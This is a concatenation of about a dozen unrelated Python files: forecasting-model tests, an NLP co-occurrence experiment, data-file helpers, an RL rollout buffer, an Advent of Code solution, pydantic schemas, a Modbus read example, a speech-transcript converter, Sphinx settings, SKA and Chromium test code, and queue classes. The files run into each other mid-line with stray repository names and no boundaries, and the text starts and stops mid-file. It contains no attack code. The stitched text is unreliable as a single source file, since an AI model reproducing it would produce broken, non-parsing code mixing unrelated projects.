Test 1.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=549, freq='D') l_expected = sorted([model_null, model_season_wday * model_season_fourier_yearly, model_season_wday, model_season_fourier_yearly]) l_result = get_l_model_auto_season( a_date, min_periods=1.5, season_add_mult='mult') self.assert_array_equal(l_result, l_expected) l_expected = [ model_null, model_season_wday + model_season_fourier_yearly, model_season_wday, model_season_fourier_yearly] l_expected.sort() l_result = get_l_model_auto_season( a_date, min_periods=1.5, season_add_mult='add') self.assert_array_equal(l_result, l_expected) # Test 1.3b - Weekly and yearly seasonality, empty l_season_yearly l_result = get_l_model_auto_season( a_date, l_season_yearly=[], min_periods=1.5, season_add_mult='add') l_expected = [model_null, model_season_wday] self.assert_array_equal(l_result, l_expected) # Test 1.3c - Weekly and yearly seasonality, empty l_season_weekly l_result = get_l_model_auto_season( a_date, l_season_weekly=[], min_periods=1.5, season_add_mult='add') l_expected = [model_null, model_season_fourier_yearly] self.assert_array_equal(l_result, l_expected) logger.info('Test 2 - Tests for series with weekly samples') # Test 2.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='W') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 2.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=80, freq='W') l_expected = [model_null, model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) logger.info('Test 3 - Tests for series with monthly samples') # Test 3.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='M') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 3.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=20, freq='M') l_expected = [model_null, model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) logger.info('Test 4 - Tests for series with quarterly samples') # Test 4.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=5, freq='Q') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 4.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=7, freq='Q') l_expected = [model_null, model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) def test_simplify_model(self): # Test 1: normal bounds model_dummy = Namespace() model_dummy.f_bounds = lambda a_x, a_y, a_date: ( np.array([3.]), np.array([7.])) model_dummy.n_params = 1 model_dummy.name = 'dummy' model_result = simplify_model(model_dummy) logger_info('model_dummy', model_dummy) logger_info('result:', model_result) self.assertEqual(model_dummy, model_result) # Test 2: min and max bounds match - model transformed into fixed model model_dummy = Namespace() model_dummy.f_bounds = lambda a_x, a_y, a_date: ( np.array([5.]), np.array([5.])) model_dummy.n_params = 1 model_dummy.name = 'dummy' model_result = simplify_model(model_dummy) logger_info('model_dummy', model_dummy) logger_info('result:', model_result) self.assertEqual(model_result.n_params, 0) def test_validate_initial_guess(self): result = validate_initial_guess( np.array([5., 5.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertTrue(result) result = validate_initial_guess( np.array([0., 10.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertTrue(result) result = validate_initial_guess( np.array([-1., 11.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertFalse(result) def test_validate_input(self): # Test1: default f_validate_input model1 = ForecastModel('model1', 0, forecast_models._f_model_null, l_f_validate_input=None) model2 = ForecastModel( 'model2', 0, forecast_models._f_model_null, l_f_validate_input=forecast_models._f_validate_input_default) model3 = ForecastModel( 'model3', 0, forecast_models._f_model_null, l_f_validate_input=[ forecast_models._f_validate_input_default]) l_expected = [forecast_models._f_validate_input_default] self.assertListEqual(model1.l_f_validate_input, l_expected) self.assertListEqual(model2.l_f_validate_input, l_expected) self.assertListEqual(model3.l_f_validate_input, l_expected) # Check composition self.assertListEqual( (model1 + model2 + model3).l_f_validate_input, l_expected) self.assertListEqual( (model1 * model2 * model3).l_f_validate_input, l_expected) # Test2 : test non-default input functions def f1(a_x, a_y, a_date): assert False model4 = ForecastModel('model3', 0, forecast_models._f_model_null, l_f_validate_input=[f1]) self.assertListEqual(model4.l_f_validate_input, [f1]) # Check composition l_expected = [forecast_models._f_validate_input_default, f1] l_result1 = (model1 + model4).l_f_validate_input l_result2 = (model1 * model4).l_f_validate_input def assert_list_func_equal(l_result, l_expected): # can't sort lists of functions, so we need to brute force the # equality test self.assertEqual(len(l_result), len(l_expected)) for result in l_result: self.assertIn(result, l_expected) assert_list_func_equal(l_result1, l_expected) assert_list_func_equal(l_result2, l_expected) # Test3: model.validate_input() self.assertTrue(model1.validate_input(None, None, None)) self.assertTrue(model2.validate_input(None, None, None)) self.assertTrue(model3.validate_input(None, None, None)) self.assertFalse(model4.validate_input(None, None, None)) self.assertTrue((model1 + model2).validate_input(None, None, None)) self.assertFalse((model1 + model4).validate_input(None, None, None)) # Test 4: model_season_wday.validate_input(): # True if input date series includes all 7 weekdays a_date_incomplete = pd.date_range('2018-01-01', periods=5, freq='D') a_date_complete = pd.date_range('2018-01-01', periods=50, freq='D') self.assertFalse(model_season_wday.validate_input(None, None, None)) self.assertFalse( model_season_wday.validate_input( None, None, a_date_incomplete)) self.assertTrue( model_season_wday.validate_input( None, None, a_date_complete)) def test_model_l_cache_vars(self): a_date = pd.date_range('2020-01-01', '2020-06-01', freq='M') a_x = np.arange(0, a_date.size) # table: model - expected cache vars df_models = pd.DataFrame( columns=['model', 'l_cache_vars_expected'], data=[ [model_linear, []], [model_season_wday, 'a_weekday'], [model_season_month, 'a_month'], [model_season_fourier_yearly, 'a_t_fourier'], [model_linear + model_season_wday, 'a_weekday'], [model_season_wday * model_season_month, ['a_month', 'a_weekday']] ] ) for i, row in df_models.iterrows(): model = row.model l_cache_vars = model.l_cache_vars expected = forecast_models._as_list(row.l_cache_vars_expected) logger.info('Model: %s, l_cache: %s, expected: %s', model, l_cache_vars, expected) self.assertSetEqual(set(l_cache_vars), set(expected)) dict_cache_vars = model.init_cache(a_x, a_date) logger_info('dict cache vars: ', dict_cache_vars) def test_model_dict_f_cache(self): a_date = pd.date_range('2020-01-01', '2020-06-01', freq='M') a_x = np.arange(0, a_date.size) model_datelist = get_model_from_datelist( 'datelist', ['2018-01-01', '2018-01-02'], ['2018-12-25', '2019-12-25'] ) # table: model - expected cache functions df_models = pd.DataFrame( columns=['model', 'l_cache_vars_expected'], data=[ [model_linear, []], [model_calendar_uk, []], [model_calendar_us, []], [model_calendar_ita, []], [model_datelist, []], [model_season_wday_2, []] ] ) for i, row in df_models.iterrows(): model = row.model dict_f_cache = model.dict_f_cache expected = forecast_models._as_list(row.l_cache_vars_expected) logger.info('Model: %s, l_cache: %s, expected: %s', model, dict_f_cache, expected) # self.assertListEqual(dict_f_cache, expected) dict_cache_vars = model.init_cache(a_x, a_date) logger_info('dict cache vars: ', dict_cache_vars) ## todo: doesn't work def test_get_model_from_calendars(self): model_calendar = get_model_from_calendars(CalendarChristmasUK()) logger_info('model_calendar:', model_calendar) self.assertEqual(model_calendar.n_params, 1) logger_info('parameters:', model_calendar.n_params) model_calendar = get_model_from_calendars( [CalendarChristmasUK(), CalendarBankHolUK()], 'calendar2' ) logger_info('model_calendar:', model_calendar) self.assertEqual(model_calendar.n_params, 2) logger_info('parameters:', model_calendar.n_params) def test_get_model_from_date_list(self): model_datelist = get_model_from_datelist( 'datelist', ['2018-01-01', '2018-01-02'], ['2018-12-25', '2019-12-25'] ) logger_info('model_datelist:', model_datelist) logger_info('parameters:', model_datelist.n_params)# -*- coding: utf-8 -*- import sys sys.path.append("termspec/") import helpers as util import setup_data as sd import scores as sc import numpy as np from timer import Timer def conduct(verbose = True, window_size = 4, corpus = 'brown', score_fn = 'dice', language = 'english'): print('Conducting Experiment with Context Window...') print('Language: {}, Corpus: {}, Window Size: {}, Score Function: {}'.format(language, corpus, window_size, score_fn)) filename = 'experiment_context_window' # results_filename = 'results_' + filename + '_' + corpus + '_ws' + str(window_size) + '_' + score_fn + '.csv' # # Ugly Exception. No time to build it in properly... # binary = False # if score_fn is 'binary': # binary = True # score_fn = 'raw_count' data = sd.easy_setup_context_window( fqt = 10, window_size = window_size, score_fn = score_fn, filename = filename, corpus = corpus, deserialize = True, serialize = True ) words = data['words'] # Word-Word Co-occurrence Matrix WWC = data['WWC'] # # Continuation of the ugly exception # if binary: # WWC[np.nonzero(WWC)] = 1 # score_fn = binary if language is 'german': print(len(sd.word_pairs_german)) print(sd.word_pairs_german) word_pairs = util.remove_word_pairs_not_in_corpus(sd.word_pairs_german, words, language = 'german') else: word_pairs = util.remove_word_pairs_not_in_corpus(sd.word_pairs, words) # word_pairs = [('foo', 'bar'), ('bar', 'baz'), ('foo', 'plotz')] # print(len(word_pairs)) # print(word_pairs) scores = [ 'nzds', 'mdcs_cosi', 'mdcs_seuc', 'sca_mdcs_cosi', 'sca_mdcs_seuc', ] # For each wordpair, calculate ALL the scores! word_scores = {} for pair in word_pairs: for word in pair: word = util.normalize([word], language)[0] if not word in word_scores: with Timer() as t: word_scores[word] = {} word_scores[word]['nzds'] = sc.nzds(M = WWC, word = word, fns = words) word_scores[word]['mdcs_cosi'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'cosine') word_scores[word]['mdcs_seuc'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'seuclidean') word_scores[word]['sca_mdcs_cosi'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'cosine', scaled = True) word_scores[word]['sca_mdcs_seuc'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'seuclidean', scaled= True) # print('##### Calculated scores for %s in %4.1f' % (word, t.secs)) # print(word_scores[word]) ##################################################################### # RESULTS results = np.zeros( (len(word_pairs),len(scores)), dtype=bool) for i, pair in enumerate(word_pairs): word_a = util.normalize([pair[0]], language)[0] word_b = util.normalize([pair[1]], language)[0] for j, score in enumerate(scores): # By Convention, the More General Term comes first in word_pairs. # Checks whether the Score reflects that! results[i,j] = word_scores[word_a][score] > word_scores[word_b][score] total_hits = [np.sum(results, axis = 0)[i] for i, score in enumerate(scores)] percent_hits = [np.sum(results, axis = 0)[i] / len(word_pairs) for i, score in enumerate(scores)] results = np.vstack([results, total_hits, percent_hits]) # for j, score in enumerate(scores): # results[len(word_pairs)] = np.sum(results, axis = 1) labels = word_pairs + ['total hits','hit rate'] # Only give out detailed results in verbose mode. if not verbose: results = results[-2:,:] labels = labels[-2:] util.printprettymatrix(M=results, rns = labels, cns = scores) return results, labels, scores # print(np.sum(results, axis = 0) / results.shape[0], np.sum(results, axis = 0), results.shape[0])# -*- coding: utf-8 -*- # !/bin/env python import json import os import gzip from exceptions import NonExistingData DATA_PATH = os.path.dirname(os.path.realpath(__file__)) FILES_PATH = os.path.abspath(os.path.join(DATA_PATH, "..", "files")) def exists_data(file_name): return os.path.exists(file_name) def read_from_file(file_name, format="json"): with open(file_name, "r") as f: if format == "json": return json.load(f) return '\n'.join(f.readlines()) def ensure_dir(file_name): d = os.path.dirname(file_name) if not os.path.exists(d): os.makedirs(d) def write_to_file(file_name, text): ensure_dir(file_name) with open(file_name, "w") as f: f.write(text) def __get_data_from_file__(func): def get_data(*args, **kwargs): self = args[0] file_name = self.get_file_name(*args[1:], **kwargs) if exists_data(file_name): data = read_from_file(file_name) return data return func(*args, **kwargs) return get_data def __write_data_to_file__(func): def write_data(*args, **kwargs): self = args[0] data = func(*args, **kwargs) file_name = self.get_file_name(*args[1:], **kwargs) write_to_file(file_name, json.dumps(data)) return data return write_data def iterate_supported_countries(): path = os.path.join(FILES_PATH, "cities") for country in os.listdir(path): if os.path.isdir(os.path.join(path, country)): yield country def iterate_main_cities(country): path = os.path.join(FILES_PATH, "cities", country, "main_cities.json.gz") if not os.path.exists(path): raise NonExistingData("Main cities not found for country=%s" % country) with gzip.open(path, "r") as f: for city in json.load(f): yield city def iterate_main_cities_name(country): for city in iterate_main_cities(country): yield city["city"] def iterate_cities(country): path = os.path.join(FILES_PATH, "cities", country, "cities.json.gz") if not os.path.exists(path): raise NonExistingData("Cities not found for country=%s" % country) with gzip.open(path, "r") as f: for city in json.load(f): yield city def iterate_cities_name(country): for city in iterate_cities(country): yield city["city"] def iterate_city_by_name(country, *city_names): for city in iterate_cities(country): if city["city"] in city_names: yield city zhangdongkun98/rl-lib1-10 import numpy as np from abc import ABC, abstractmethod from typing import List import torch from ..basic import Data as Experience from .tools import stack_data class RolloutBuffer(object): def __init__(self, device, batch_size=-1): self.batch_size, self.device = batch_size, device self._states, self._actions = [], [] self._rewards, self._dones = [], [] self._probs = [] self._memory: List[Experience] = [] self._prob_cache = None self.rollout_reward = False def push(self, experience: Experience): experience.update(prob=self._prob_cache) self._memory.append(experience) def push_prob(self, prob): self._prob_cache = prob def sample(self, gamma): if not self.rollout_reward: self.rollout_reward = True rewards = [] discounted_reward = 0 for e in reversed(self._memory): if e.done: discounted_reward = 0 discounted_reward = e.reward + gamma * discounted_reward rewards.insert(0, discounted_reward) for e, reward in zip(self._memory, rewards): e.update(reward=reward) self._memory = np.array(self._memory, dtype=Experience) batch_size = len(self) if self.batch_size <= 0 else self.batch_size indices = np.random.choice(len(self), batch_size, replace=False) batch = self._memory[indices] experiences: Experience = self._batch_stack(batch) return experiences.to(self.device) def __len__(self): return len(self._memory) def clear(self): del self._memory self._memory = [] self._prob_cache = None self.rollout_reward = False def _batch_stack(self, batch): """ To be override. """ result = stack_data(batch) result.update(reward=[*torch.tensor(result.reward, dtype=torch.float32).unsqueeze(1)]) result.update(done=[*torch.tensor(result.done, dtype=torch.float32).unsqueeze(1)]) result = result.cat(dim=0) result.reward.unsqueeze_(1) result.done.unsqueeze_(1) return result mcbor/advent_of_code_20161-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 17b.py ~~~~~~ Advent of Code 2017 - Day 17: Spinlock Part Two The spinlock does not short-circuit. Instead, it gets more angry. At least, you assume that's what happened; it's spinning significantly faster than it was a moment ago. You have good news and bad news. The good news is that you have improved calculations for how to stop the spinlock. They indicate that you actually need to identify the value after 0 in the current state of the circular buffer. The bad news is that while you were determining this, the spinlock has just finished inserting its fifty millionth value (50000000). What is the value after 0 the moment 50000000 is inserted? :copyright: (c) 2017 by . :license: MIT, see LICENSE for more details. """ import sys def solve(steps): """Return value next to 0 after 50 million insertions. :steps: number of steps before every insertion :returns: value next to 0 >>> solve(3) 1222153 >>> solve(301) 33601318 """ c = 0 res = 0 for i in range(1, 50000000): c = (c + steps) % i + 1 if c == 1: res = i return res def main(argv): if len(argv) == 2: f = open(argv[1], 'r') else: sys.stderr.write('reading from stdin...\n') f = sys.stdin print(solve(int(f.read().strip()))) if __name__ == "__main__": sys.exit(main(sys.argv)) from typing import List, Optional from pydantic import BaseModel class MovieBase(BaseModel): title: str subtitle: Optional[str] = None price: float description: Optional[str] = None class MovieCreate(MovieBase): pass class Movie(MovieBase): id: int class Config: orm_mode = True class Movies(MovieBase): id: int movies: List[Movie] class Config: orm_mode = True class MovieUpdate(MovieBase): id: int zsheep5/pyModbusTCPexamples/min_read_bit.py #!/usr/bin/env python # -*- coding: utf-8 -*- import time # min_read_bit # minimal code for read 10 bits on IPv4 192.168.0.200 and print result on stdout from pyModbusTCP.client import ModbusClient c = ModbusClient(host="192.168.0.200", auto_open=True) while True: # read 10 bits at address 20480 bits = c.read_coils(20480, 10) print("bit ad #0 to 9: "+str(bits) if bits else "read error") # sleep 2s time.sleep(2) #!/usr/bin/env python3 # 主要功能是将aishell1的transcript文件中的说话人编号BAC009S0002W0122 转换成AISHELL2格式 IS0002W0122 # 因为aishell2采用结巴分词,移除标注的空格 new_transcripts = [] new_wav_scp = [] aishell_transcripts = open("../transcript/aishell_transcript_v0.8_remove_space.txt", encoding="utf-8") transcripts = aishell_transcripts.readlines() trans_txt = open("train/trans.txt", 'w', encoding="utf-8") wav_scp = open("train/wav.scp", 'w', encoding="utf-8") for transcript in transcripts: print(transcript) spkid = "I" + transcript[6:16] print(spkid) lable = transcript[16:len(transcript)] print(lable) new_transcripts.append(spkid + "\t" + lable) new_wav_scp.append(spkid + "\t" + "wav/"+spkid[1:6]+"/"+spkid+".wav\n") print(new_transcripts) trans_txt.writelines(new_transcripts) wav_scp.writelines(new_wav_scp) aishell_transcripts.close() trans_txt.close() wav_scp.close() print("All Done!") dhill2522/ChE436-projectutils.py import matplotlib.pyplot as plt import pandas as pd def plot_data(data_file='data.csv', saved_image='data.png', show_plots=True): data = pd.read_csv(data_file, sep=',') plt.subplot(2, 1, 1) plt.plot(data['# time'], data['D'], label='D') # Plot this first on purpose plt.plot(data['# time'], data['P'], label='P') plt.plot(data['# time'], data['I'], label='I') plt.plot(data['# time'], data['Err'], label='Error') plt.legend() plt.subplot(2, 1, 2) plt.plot(data['# time'], data['box temp'], label='box temp') plt.plot(data['# time'], data['outside temp'], label='outside temp') plt.plot(data['# time'], data['SP'], label='setpoint') plt.legend() plt.savefig(saved_image) if show_plots: plt.show() def blink_rgb_leb(): import RPi.GPIO as GPIO GPIO.setmode(GPIO.BOARD) print('LED should start blinking now. Ctl-C to stop.') GPIO.setup(12, GPIO.OUT) try: while(True): GPIO.output(12, GPIO.HIGH) time.sleep(1) GPIO.output(12, GPIO.LOW) time.sleep(1) except KeyboardInterrupt: sys.exit() if __name__ == '__main__': plot_data(data_file='step_test.csv') train_procgen/netrand_policy.py import tensorflow as tf from baselines.common.policies import _normalize_clip_observation, PolicyWithValue from baselines.common.input import observation_placeholder, encode_observation from baselines.common.models import get_network_builder from .utils import reduce_std def build_policy(env, policy_network, value_network=None, normalize_observations=False, estimate_q=False, **policy_kwargs): if isinstance(policy_network, str): network_type = policy_network policy_network = get_network_builder(network_type)(**policy_kwargs) def policy_fn(nbatch=None, nsteps=None, sess=None, observ_placeholder=None, randomization=True): ob_space = env.observation_space extra_tensors = {} X = observ_placeholder if observ_placeholder is not None else observation_placeholder(ob_space, batch_size=None) encoded_x = encode_observation(ob_space, X) # Randomization if randomization: encoded_x = tf.layers.conv2d(encoded_x / 255., 3, 3, padding='same', kernel_initializer=tf.initializers.glorot_normal(), trainable=False, name='randcnn') * 255. randcnn_param = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope="ppo2_model/randcnn") extra_tensors['randcnn_param'] = randcnn_param with tf.variable_scope('pi', reuse=tf.AUTO_REUSE): policy_latent = policy_network(encoded_x) extra_tensors['latent_fts'] = policy_latent if isinstance(policy_latent, tuple): policy_latent, recurrent_tensors = policy_latent if recurrent_tensors is not None: # recurrent architecture, need a few more steps nenv = nbatch // nsteps assert nenv > 0, 'Bad input for recurrent policy: batch size {} smaller than nsteps {}'.format(nbatch, nsteps) policy_latent, recurrent_tensors = policy_network(encoded_x, nenv) extra_tensors.update(recurrent_tensors) _v_net = value_network if _v_net is None or _v_net == 'shared': vf_latent = policy_latent else: if _v_net == 'copy': _v_net = policy_network else: assert callable(_v_net) with tf.variable_scope('vf', reuse=tf.AUTO_REUSE): # TODO recurrent architectures are not supported with value_network=copy yet vf_latent = _v_net(encoded_x) policy = PolicyWithValue( env=env, observations=X, latent=policy_latent, vf_latent=vf_latent, sess=sess, estimate_q=estimate_q, **extra_tensors ) return policy return policy_fn # coding=utf-8 import os import sys # import package (from setup) to get infos # add root dir to python path (for tools lke nbsphinx) BASE_DIR = os.path.join(os.path.dirname(__file__), "..") os.environ["PYTHONPATH"] = BASE_DIR sys.path.insert(0, BASE_DIR) # needed for import setup from setup import pkg # noqa: E402 project = pkg.__title__ description = pkg.__doc__ version = pkg.__version__ author = pkg.__author__ email = pkg.__email__ copyright = pkg.__copyright__ release = version html_search_language = "en" html_show_copyright = False todo_include_todos = False add_module_names = False show_authors = True html_show_sourcelink = False html_show_sphinx = True docs_path = "." html_theme_options = {} html_theme = "sphinx_rtd_theme" master_doc = "index" source_encoding = "utf-8" source_suffix = { ".rst": "restructuredtext", ".md": "markdown", } pygments_style = "sphinx" html_logo = os.path.join(docs_path, "_static/logo.svg") html_favicon = os.path.join(docs_path, "_static/favicon.ico") templates_path = [os.path.join(docs_path, "_templates")] html_static_path = [os.path.join(docs_path, "_static")] exclude_dirs = [] # do not include in autodoc nitpicky = False html_use_index = True add_function_parentheses = True extensions = [ "sphinx.ext.autodoc", "sphinx.ext.todo", "sphinx.ext.mathjax", "sphinx.ext.viewcode", "sphinx.ext.graphviz", "sphinx.ext.napoleon", "nbsphinx", "myst_parser", # markdown ] # Napoleon settings napoleon_google_docstring = True napoleon_numpy_docstring = True napoleon_include_init_with_doc = False napoleon_include_private_with_doc = False napoleon_include_special_with_doc = False napoleon_use_admonition_for_examples = False napoleon_use_admonition_for_notes = False napoleon_use_admonition_for_references = False napoleon_use_ivar = False napoleon_use_param = True napoleon_use_rtype = True napoleon_use_keyword = True # Mathjax settings mathjax_path = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.7/MathJax.js" mathjax_config = { "extensions": ["tex2jax.js"], "jax": ["input/TeX", "output/CommonHTML"], "tex2jax": { "inlineMath": [["$", "$"], ["\\(", "\\)"]], "displayMath": [["$$", "$$"], ["\\[", "\\]"]], "processEscapes": True, }, "HTML-CSS": {"availableFonts": ["TeX"]}, "menuSettings": {"zoom": "Double-Click", "mpContext": True, "mpMouse": True}, "config": [], "showProcessingMessages": False, "messageStyle": "none", "showMathMenu": False, "displayAlign": "left", } # graphviz graphviz_output_format = "svg" # svg | png # -*- coding: utf-8 -*- # # This file is part of the SKA PST LMC project # # Distributed under the terms of the BSD 3-clause new license. # See LICENSE for more info. """This module contains tests for the RECV component managers class.""" import logging from typing import Callable from unittest.mock import MagicMock import pytest from ska_tango_base.control_model import CommunicationStatus, SimulationMode from ska_pst_lmc.smrb.smrb_component_manager import PstSmrbComponentManager from ska_pst_lmc.smrb.smrb_model import SharedMemoryRingBufferData from ska_pst_lmc.smrb.smrb_process_api import PstSmrbProcessApi, PstSmrbProcessApiSimulator @pytest.fixture def component_manager( simulation_mode: SimulationMode, logger: logging.Logger, api: PstSmrbProcessApi, communication_state_callback: Callable[[CommunicationStatus], None], component_state_callback: Callable, ) -> PstSmrbComponentManager: """Create instance of a component manager.""" return PstSmrbComponentManager( simulation_mode=simulation_mode, logger=logger, communication_state_callback=communication_state_callback, component_state_callback=component_state_callback, api=api, ) @pytest.fixture def api( simulation_mode: SimulationMode, logger: logging.Logger, component_state_callback: Callable, ) -> PstSmrbProcessApi: """Create an API instance.""" if simulation_mode == SimulationMode.TRUE: return PstSmrbProcessApiSimulator( logger=logger, component_state_callback=component_state_callback, ) else: raise ValueError("Expected simulation mode to be true") @pytest.fixture def monitor_data() -> SharedMemoryRingBufferData: """Create an an instance of ReceiveData for monitor data.""" from ska_pst_lmc.smrb.smrb_simulator import PstSmrbSimulator simulator = PstSmrbSimulator() simulator.scan(args={}) return simulator.get_data() def test_start_communicating_calls_connect_on_api( component_manager: PstSmrbComponentManager, api: PstSmrbProcessApi, ) -> None: """Assert start/stop communicating calls API.""" api = MagicMock(wraps=api) component_manager._api = api component_manager.start_communicating() api.connect.assert_called_once() api.disconnect.assert_not_called() component_manager.stop_communicating() api.disconnect.assert_called_once() @pytest.mark.parametrize( "property", [ ("ring_buffer_utilisation"), ("ring_buffer_size"), ("number_subbands"), ("subband_ring_buffer_utilisations"), ("subband_ring_buffer_sizes"), ], ) def test_properties_come_from_api_monitor_data( component_manager: PstSmrbComponentManager, api: PstSmrbProcessApi, monitor_data: SharedMemoryRingBufferData, property: str, ) -> None: """Test properties are coming from API monitor data.""" api = MagicMock() type(api).monitor_data = monitor_data component_manager._api = api actual = getattr(component_manager, property) expected = getattr(monitor_data, property) assert actual == expected efitr/Core-Data-Structures #!python from linkedlist import LinkedList, Node # Implement LinkedQueue below, then change the assignment at the bottom # to use this Queue implementation to verify it passes all tests class LinkedQueue(object): def __init__(self, iterable=None): """Initialize this queue and enqueue the given items, if any.""" # Initialize a new linked list to store the items self.linked_list = LinkedList() if iterable is not None: for item in iterable: self.enqueue(item) def __repr__(self): """Return a string representation of this queue.""" return 'Queue({} items, front={})'.format(self.length(), self.front()) def is_empty(self): """Return True if this queue is empty, or False otherwise.""" if self.linked_list.size == 0: return True return False def length(self): """Return the number of items in this queue.""" return self.linked_list.length() def enqueue(self, item): """Insert the given item at the back of this queue. Running time: O(1) – Why? You are appending at the end of the LinkList, """ self.linked_list.append(item) def front(self): """Return the item at the front of this queue without removing it, or None if this queue is empty.""" if self.linked_list.is_empty(): return None return self.linked_list.head.data def dequeue(self): """Remove and return the item at the front of this queue, or raise ValueError if this queue is empty. Running time: O(???) – Why? [TODO]""" if self.is_empty(): raise ValueError("No items in Queue to Dequeue") item = self.linked_list.head.data self.linked_list.delete(item) return item # Implement ArrayQueue below, then change the assignment at the bottom # to use this Queue implementation to verify it passes all tests class ArrayQueue(object): def __init__(self, iterable=None): """Initialize this queue and enqueue the given items, if any.""" # Initialize a new list (dynamic array) to store the items self.python3_dynamic_array = list() if iterable is not None: for item in iterable: self.enqueue(item) def __repr__(self): """Return a string representation of this queue.""" return 'Queue({} items, front={})'.format(self.length(), self.front()) def is_empty(self): """Return True if this queue is empty, or False otherwise.""" if len(self.python3_dynamic_array) == 0: return True return False def length(self): """Return the number of items in this queue.""" return len(self.python3_dynamic_array) def enqueue(self, item): """Insert the given item at the back of this queue. Running time: O(1) – Why? The python3 dynamic array when placing something at the end doesnt need to move any index it just makes the space in memory have one more place next to it.""" return self.python3_dynamic_array.append(item) def front(self): """Return the item at the front of this queue without removing it, or None if this queue is empty.""" if self.is_empty(): return None return self.python3_dynamic_array[0] def dequeue(self): """Remove and return the item at the front of this queue, or raise ValueError if this queue is empty. Running time: O(n) – Why? There is the need to [TODO]""" if self.is_empty() is True: raise ValueError('There is not value to dequeue') return self.python3_dynamic_array.pop(0) # Implement LinkedQueue and ArrayQueue above, then change the assignment below # to use each of your Queue implementations to verify they each pass all tests # Queue = LinkedQueue Queue = ArrayQueue zealoussnow/chromium # Copyright 2017 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import optparse import six from blinkpy.common.system.executive_mock import MockExecutive from blinkpy.common.system.output_capture import OutputCapture from blinkpy.tool.commands.rebaseline_test import RebaselineTest from blinkpy.tool.commands.rebaseline_unittest import BaseTestCase class TestRebaselineTest(BaseTestCase): command_constructor = RebaselineTest @staticmethod def options(**kwargs): return optparse.Values( dict( { 'builder': 'MOCK Mac10.11', 'port_name': None, 'test': 'userscripts/another-test.html', 'suffixes': 'txt', 'results_directory': None, 'build_number': None, 'step_name': None, 'flag_specific': None, }, **kwargs)) def test_rebaseline_test_internal_with_port_that_lacks_buildbot(self): self.tool.executive = MockExecutive() port = self.tool.port_factory.get('test-win-win7') baseline_relative_path = 'platform/test-win-win10/failures/expected/image-expected.txt' baseline_local_absolute_path = port.host.filesystem.join( port.web_tests_dir(), baseline_relative_path) self._write(baseline_local_absolute_path, 'original win10 result') actual_result_url = ( 'https://test-results.appspot.com/data/layout_results/MOCK_Win10/' + 'results/layout-test-results/failures/expected/image-actual.txt') self.tool.web.urls[actual_result_url] = b'new win10 result' oc = OutputCapture() try: options = optparse.Values({ 'optimize': True, 'builder': 'MOCK Win10', 'port_name': None, 'suffixes': 'txt', 'verbose': True, 'test': 'failures/expected/image.html', 'results_directory': None, 'build_number': None, 'step_name': None, 'flag_specific': None, }) oc.capture_output() self.command.execute(options, [], self.tool) finally: out, _, _ = oc.restore_output() six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) self.assertMultiLineEqual( self._read(baseline_local_absolute_path), 'new win10 result') self.assertFalse( self.tool.filesystem.exists( self.tool.filesystem.join( port.web_tests_dir(), 'platform/test-win-win7/failures/expected/image-expected.txt' ))) # We should not change TestExpectations for unexpected failures. self.assertMultiLineEqual(out, '') def test_baseline_directory(self): self.assertMultiLineEqual( self.command.baseline_directory('MOCK Mac10.11'), '/test.checkout/wtests/platform/test-mac-mac10.11') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Mac10.10'), '/test.checkout/wtests/platform/test-mac-mac10.10') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Trusty'), '/test.checkout/wtests/platform/test-linux-trusty') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Precise'), '/test.checkout/wtests/platform/test-linux-precise') def test_rebaseline_updates_expectations_file_noop(self): # pylint: disable=protected-access self._zero_out_test_expectations() self._write(self.test_expectations_path, ( 'Bug(B) [ Mac Linux Win7 Debug ] fast/dom/Window/window-postmessage-clone-really-deep-array.html [ Pass ]\n' 'Bug(A) [ Debug ] : fast/css/large-list-of-rules-crash.html [ Failure ]\n' )) self._write( 'fast/dom/Window/window-postmessage-clone-really-deep-array.html', 'Dummy test contents') self._write('fast/css/large-list-of-rules-crash.html', 'Dummy test contents') self._write('userscripts/another-test.html', 'Dummy test contents') self.command._rebaseline_test_and_update_expectations( self.options(suffixes='png,wav,txt')) six.assertCountEqual(self, self.tool.web.urls_fetched, [ self.WEB_PREFIX + '/userscripts/another-test-actual.png', self.WEB_PREFIX + '/userscripts/another-test-actual.wav', self.WEB_PREFIX + '/userscripts/another-test-actual.txt' ]) new_expectations = self._read(self.test_expectations_path) self.assertMultiLineEqual(new_expectations, ( 'Bug(B) [ Mac Linux Win7 Debug ] fast/dom/Window/window-postmessage-clone-really-deep-array.html [ Pass ]\n' 'Bug(A) [ Debug ] : 